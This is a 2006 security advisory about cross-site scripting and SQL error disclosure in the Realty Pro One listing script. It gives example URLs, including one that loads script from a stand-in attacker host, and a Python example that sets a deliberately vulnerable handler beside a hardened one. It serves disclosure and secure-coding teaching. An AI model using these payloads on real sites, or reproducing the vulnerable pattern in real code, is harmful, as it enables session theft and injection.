Realty Pro One Property Listing Script

2006-05-30 / 2006-05-31
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Realty Pro One
http://realtypro1.2run2.com/index.php

Description: Realty Pro One is a powerful property listing tool with many features.

Affected files:
searchlookup.php
images.php
index_other.php
request_info.php
?listingid

Exploits & Vulns:

XSS vulnerability via the listingid variable:
http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

The page also outputs the SQL query error message:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'This is remote text via xss.js located at evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re

More XSS vulnerabilities:
http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS]
http://www.example.com/images.php?id=[XSS]
http://www.example.com/listings/index_other.php?listingid=[XSS]

By putting "> in front of and <" behind our script tags:
http://www.example.com/listings/request_info.php?agentid=101005">[XSS]<"&listtype=homes&listingid=222003

No version number for this script was given on the website.
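The two defects the advisory describes, a query parameter reflected unescaped into the page and the same value interpolated into SQL so that the database error text reaches the client, share one root cause. The following is an added example (not code from Realty Pro One, whose source is not shown here) that models that pattern in Python against a constructed in-memory SQLite table, with the hardened handler beside it: validate the id as digits only, bind it as a query parameter, HTML-escape anything reflected, and return a generic message on database errors. The table name, column names and the evilsite.example URL are assumptions.

```python
import html
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the listing database; not the product's real schema.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE listings (listingid INTEGER PRIMARY KEY, title TEXT)")
DB.execute("INSERT INTO listings VALUES (222003, 'Three-bed home')")


def render_listing_vulnerable(query_string: str) -> str:
    """Models the pattern in the advisory: the raw listingid is reflected into
    HTML unescaped and spliced into the SQL text, and the database error
    message is echoed verbatim to the client."""
    listingid = parse_qs(query_string).get("listingid", [""])[0]
    try:
        row = DB.execute(
            f"SELECT title FROM listings WHERE listingid={listingid}").fetchone()
    except sqlite3.Error as exc:            # error text leaks to the response
        return f"<p>Listing {listingid}</p><p>SQL error: {exc}</p>"
    title = row[0] if row else "not found"
    return f"<p>Listing {listingid}: {title}</p>"


def render_listing_hardened(query_string: str) -> str:
    """Fail closed on anything but an ASCII integer, bind the value as a
    parameter, escape every reflected string, and never expose SQL errors."""
    raw = parse_qs(query_string).get("listingid", [""])[0]
    if not re.fullmatch(r"[0-9]{1,12}", raw):
        return "<p>Invalid listing id</p>"  # the bad value is not reflected at all
    try:
        row = DB.execute("SELECT title FROM listings WHERE listingid=?",
                         (int(raw),)).fetchone()
    except sqlite3.Error:
        # Log server-side in a real application; the client gets a generic message.
        return "<p>Temporary error, please try again later</p>"
    title = html.escape(row[0]) if row else "not found"
    return f"<p>Listing {html.escape(raw)}: {title}</p>"


if __name__ == "__main__":
    # Constructed query string shaped like the advisory's listingid example.
    probe = "listingid=<SCRIPT%20SRC=http://evilsite.example/xss.js></SCRIPT>"
    print(render_listing_vulnerable(probe))   # script tag and SQL error echoed back
    print(render_listing_hardened(probe))     # generic message, nothing reflected
    print(render_listing_hardened("listingid=222003"))
```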


Copyright 2019, cxsecurity.com
